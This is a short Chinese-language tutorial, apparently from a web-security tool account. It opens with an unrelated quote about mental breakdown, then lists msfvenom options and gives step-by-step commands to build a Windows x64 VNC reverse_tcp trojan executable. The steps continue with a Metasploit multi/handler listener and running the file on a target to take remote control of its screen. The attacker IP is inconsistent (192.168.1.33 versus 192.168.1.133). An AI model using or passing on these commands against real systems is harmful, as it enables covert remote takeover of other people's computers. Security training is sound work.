以前的人，要疯要癫要崩溃，都特别戏剧化，比如披头散发，涕泗横流，瞠目结舌等等。现在的人不会，他就静静地坐在那里，面无表情，不声不响，看着很正常，但禁不起触碰。你上前轻轻碰一下，问一句，他就垮了，就崩溃了。。。

---- 网易云热评

一、生成方式：利用msf模块中的msfvenom模块

二、原理：msfvenom是msfpayload、msfencode的结合体，利用msfvenom生成木马程序，并在目标机上执行，在本地监听上线

三、msfvenom命令行选项如下

-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload，请使用'-'或者stdin指定

-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled <length> 为payload预先指定一个NOP滑动长度

-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder [encoder] 指定需要使用的encoder（编码器）

-a, --arch <architecture> 指定payload的目标架构

--platform <platform> 指定payload的目标平台

-s, --space <length> 设定有效攻击荷载的最大长度

-b, --bad-chars <list> 设定规避字符集，比如: '\x00\xff'

-i, --iterations <count> 指定payload的编码次数

-c, --add-code <path> 指定一个附加的win32 shellcode文件

-x, --template <path> 指定一个自定义的可执行文件作为模板

-k, --keep 保护模板程序的动作，注入的payload作为一个新的进程运行

--payload-options 列举payload的标准选项

-o, --out <path> 保存payload

-v, --var-name <name> 指定一个自定义的变量，以确定输出格式

--shellest 最小化生成payload

-h, --help 查看帮助选项

--help-formats 查看msf支持的输出格式列表

四、使用方法

1、msfvenom --list platforms 显示支持的平台

2、msfvenom --list formats 显示支持的格式

3、msfvenom --list archs 显示支持的架构

4、msfvenom --list encoders 显示支持的编码器

5、生成木马

目标主机：192.168.1.129（win7 x64）

攻击机：192.168.1.33

攻击端口：12121

生成木马：msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe

6、进入监听模块 use exploit/multi/handler

7、设置payload反弹 set payload windows/x64/vncinject/reverse_tcp

8、查看需要设置的参数：show options

9、设置攻击机ip：set lhost 192.168.1.133

10、设置攻击端口：set lport 12121

11、将生成的exe文件上传到目标主机并运行

12、run攻击

13、攻击机的监控画面

14、目标主机画面

禁止非法，后果自负

欢迎关注公众号：web安全工具库